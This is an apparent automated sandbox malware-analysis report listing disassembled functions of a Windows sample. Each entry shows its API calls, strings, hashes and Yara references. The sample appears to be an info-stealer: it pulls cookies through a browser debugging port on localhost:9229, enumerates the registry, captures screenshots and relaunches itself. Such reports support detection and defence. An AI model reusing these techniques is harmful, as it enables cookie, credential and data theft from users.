                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C9644
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 1201316467-3542011879
                                    • Opcode ID: 3c19cd9eb6ae8ddaa9cf549ffe6347edd5ff7d478ab0b3e93b47c55229b8720b
                                    • Instruction ID: 51819bc3994493bb0864123a97474fe210a9fca81d0d92cff9b01db401eb434e
                                    • Opcode Fuzzy Hash: 3c19cd9eb6ae8ddaa9cf549ffe6347edd5ff7d478ab0b3e93b47c55229b8720b
                                    • Instruction Fuzzy Hash: 98E1F471E10258EBDF14DFA8C884BDEBBB5FF48300F1044A9E549E7281DB74AA46CB95
                                    Function 008E3700 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 222registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008E7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 008E722E
                                    • RegOpenKeyExA.ADVAPI32(?,0053B258,00000000,00020019,?), ref: 008E375D
                                    • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 008E3797
                                    • wsprintfA.USER32 ref: 008E37C2
                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 008E37E0
                                    • RegCloseKey.ADVAPI32(?), ref: 008E37EE
                                    • RegCloseKey.ADVAPI32(?), ref: 008E37F8
                                    • RegQueryValueExA.ADVAPI32(?,0053E178,00000000,000F003F,?,?), ref: 008E3841
                                    • lstrlen.KERNEL32(?), ref: 008E3856
                                    • RegQueryValueExA.ADVAPI32(?,0053E190,00000000,000F003F,?,00000400), ref: 008E38C7
                                    • RegCloseKey.ADVAPI32(?), ref: 008E3912
                                    • RegCloseKey.ADVAPI32(?), ref: 008E3929
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                    • String ID: - $%s\%s$?$xS
                                    • API String ID: 13140697-3754986874
                                    • Opcode ID: 275fb1d683c08947f0a9f4a2b1eaf94c91ab7cfa00c58a9bdf23bf971bd0fa33
                                    • Instruction ID: 039812707ed87e20aec83157ea5008ca9d83174d769c2dd75278e729c292efb4
                                    • Opcode Fuzzy Hash: 275fb1d683c08947f0a9f4a2b1eaf94c91ab7cfa00c58a9bdf23bf971bd0fa33
                                    • Instruction Fuzzy Hash: 839161729002489FCB10DFE5DC84AEEBBB9FB49310F158169E609EB251DB319E46CF90
                                    Function 008CB3F9 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008CB420
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB46E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB499
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008CB4A1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB4C9
                                    • lstrlen.KERNEL32(008F5218), ref: 008CB540
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB564
                                    • lstrcat.KERNEL32(00000000,008F5218), ref: 008CB570
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB599
                                    • lstrlen.KERNEL32(00000000), ref: 008CB61D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB647
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008CB64F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB677
                                    • lstrlen.KERNEL32(008F509C), ref: 008CB6EE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB712
                                    • lstrcat.KERNEL32(00000000,008F509C), ref: 008CB71E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB74E
                                    • lstrlen.KERNEL32(?), ref: 008CB857
                                    • lstrlen.KERNEL32(?), ref: 008CB866
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB88E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID:
                                    • API String ID: 2500673778-0
                                    • Opcode ID: ae58645bd6113efef93e40b34fc40fcfec90b28570db9bb6632e4aaedf700fe4
                                    • Instruction ID: 61f5e331e55e279d5b21b4a66fbe0a41a1c49919b991d181e31c33e7f1a6708b
                                    • Opcode Fuzzy Hash: ae58645bd6113efef93e40b34fc40fcfec90b28570db9bb6632e4aaedf700fe4
                                    • Instruction Fuzzy Hash: 35021F70A01A058FCB24DFA9D949F6ABBB5FF44315F18816DE809DB2A1DB35DC42CB81
                                    Function 008C90F0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenA.WININET(008ED014,00000001,00000000,00000000,00000000), ref: 008C910F
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 008C912C
                                    • InternetCloseHandle.WININET(00000000), ref: 008C9139
                                    • InternetReadFile.WININET(?,?,?,00000000), ref: 008C9196
                                    • InternetReadFile.WININET(00000000,?,00001000,?), ref: 008C91C7
                                    • InternetCloseHandle.WININET(00000000), ref: 008C91D2
                                    • InternetCloseHandle.WININET(00000000), ref: 008C91D9
                                    • strlen.MSVCRT ref: 008C91EA
                                    • strlen.MSVCRT ref: 008C921D
                                    • strlen.MSVCRT ref: 008C925E
                                    • strlen.MSVCRT ref: 008C927C
                                      • Part of subcall function 008C89B0: std::_Xinvalid_argument.LIBCPMT ref: 008C89C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 1530259920-2144369209
                                    • Opcode ID: c4782353c64f5d929b34b32172d04b1dfbf6089a2ccf554599cf9cbc135bd587
                                    • Instruction ID: 2550b4580c7eade7bb6db71e5e8f1e938dbd2952037188ae7df58ebb0818e863
                                    • Opcode Fuzzy Hash: c4782353c64f5d929b34b32172d04b1dfbf6089a2ccf554599cf9cbc135bd587
                                    • Instruction Fuzzy Hash: D651B571640249ABDB10DBE8DC49FEEB7B9FB44710F140169F604E3380DBB8EA498761
                                    Function 008E1640 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 008E1681
                                    • lstrcpy.KERNEL32(00000000,0052BA18), ref: 008E16AC
                                    • lstrlen.KERNEL32(?,?,?,?), ref: 008E16B9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E16D6
                                    • lstrcat.KERNEL32(00000000,?), ref: 008E16E4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E170A
                                    • lstrlen.KERNEL32(0053A3E0,?,?,?), ref: 008E171F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008E1742
                                    • lstrcat.KERNEL32(00000000,0053A3E0), ref: 008E174A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1772
                                    • ShellExecuteEx.SHELL32(?), ref: 008E17AD
                                    • ExitProcess.KERNEL32 ref: 008E17E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                    • String ID: <
                                    • API String ID: 3579039295-4251816714
                                    • Opcode ID: de8f7a0bac618f58a0e5a7622b03ff3d6a6aeb473c415833d191dda269bf9bd2
                                    • Instruction ID: 0934c0141ad0eb9b4b329ebdd22e37d2b1cda63759bbf2af7f244913d831ab94
                                    • Opcode Fuzzy Hash: de8f7a0bac618f58a0e5a7622b03ff3d6a6aeb473c415833d191dda269bf9bd2
                                    • Instruction Fuzzy Hash: 14513E71A01659ABDB10DFE5CD88AAEBBF9FF45700F044129E905E3291DF34AE06CB50
                                    Function 008E41C0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 178COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008E4264
                                    • GetDesktopWindow.USER32 ref: 008E426E
                                    • GetWindowRect.USER32(00000000,?), ref: 008E427C
                                    • SelectObject.GDI32(00000000,00000000), ref: 008E42B3
                                    • GetHGlobalFromStream.COMBASE(?,?), ref: 008E4335
                                    • GlobalLock.KERNEL32(?), ref: 008E4340
                                    • GlobalSize.KERNEL32(?), ref: 008E434F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                    • String ID: S
                                    • API String ID: 1264946473-3841253601
                                    • Opcode ID: 53c847b2b306cfabf06ebbe8063bd0a9ca174290acaae6a81b11a7d130696c92
                                    • Instruction ID: 1b01360b1128ba18ab3816da417293fe118e9c980edb3833cd81159cf52621e1
                                    • Opcode Fuzzy Hash: 53c847b2b306cfabf06ebbe8063bd0a9ca174290acaae6a81b11a7d130696c92
                                    • Instruction Fuzzy Hash: DB510571214300AFD710EFA8DC89EABBBB9FB89710F00491DF985C3250DA74E906CB92
                                    Function 008DF100 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DF134
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DF162
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008DF176
                                    • lstrlen.KERNEL32(00000000), ref: 008DF185
                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 008DF1A3
                                    • StrStrA.SHLWAPI(00000000,?), ref: 008DF1D1
                                    • lstrlen.KERNEL32(?), ref: 008DF1E4
                                    • lstrlen.KERNEL32(00000000), ref: 008DF202
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 008DF24F
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 008DF28F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$AllocLocal
                                    • String ID: ERROR
                                    • API String ID: 1803462166-2861137601
                                    • Opcode ID: 9b0a8a9b460e7be4506b89d6075fceda384dd99a2cf3a1a9634e6e78985508f1
                                    • Instruction ID: 6265bcfae7719a6bbd537530e04de8771db69941aa2e88818c3b01bb46a40180
                                    • Opcode Fuzzy Hash: 9b0a8a9b460e7be4506b89d6075fceda384dd99a2cf3a1a9634e6e78985508f1
                                    • Instruction Fuzzy Hash: 82518C35A10A059FCB21ABB8CC49F6A7BB4FF81304F144229EA46DB352DE30DC069791
                                    Function 008CA070 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentVariableA.KERNEL32(00539288,00AF9BD8,0000FFFF), ref: 008CA086
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008CA0B3
                                    • lstrlen.KERNEL32(00AF9BD8), ref: 008CA0C0
                                    • lstrcpy.KERNEL32(00000000,00AF9BD8), ref: 008CA0EA
                                    • lstrlen.KERNEL32(008F5214), ref: 008CA0F5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CA112
                                    • lstrcat.KERNEL32(00000000,008F5214), ref: 008CA11E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CA144
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008CA14F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CA174
                                    • SetEnvironmentVariableA.KERNEL32(00539288,00000000), ref: 008CA18F
                                    • LoadLibraryA.KERNEL32(0053D7B0), ref: 008CA1A3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                    • String ID:
                                    • API String ID: 2929475105-0
                                    • Opcode ID: 3fa24ad455db48cdc7fad00697d71d8e1db0510d0d6d0aa5e04d71d064290cdf
                                    • Instruction ID: 2bec9a2be6e05128721e6a298aa01cf16a302710a44fdc115c64b45fe8b11c7f
                                    • Opcode Fuzzy Hash: 3fa24ad455db48cdc7fad00697d71d8e1db0510d0d6d0aa5e04d71d064290cdf
                                    • Instruction Fuzzy Hash: 3F916B31600A189FDB24DBE8DC84F7636B5FB54709F44452DA906CB3A1EF79C982CB92
                                    Function 008DC940 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DC9A2
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DC9D1
                                    • lstrlen.KERNEL32(00000000), ref: 008DC9FC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DCA32
                                    • StrCmpCA.SHLWAPI(00000000,008F5204), ref: 008DCA43
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: 83cabad356f587cd281ab4a9ce16d724bd43c9828febd8c52e9bcb300dbf8847
                                    • Instruction ID: b997442bddda72c7bfdfa1eaba08f17bfa0ebd84295b2d6b7ec106ca22559ee9
                                    • Opcode Fuzzy Hash: 83cabad356f587cd281ab4a9ce16d724bd43c9828febd8c52e9bcb300dbf8847
                                    • Instruction Fuzzy Hash: FC61717190171AABDB10EFB48845EAE7BB8FF09350F04026AE841E7351DB74D905CBA1
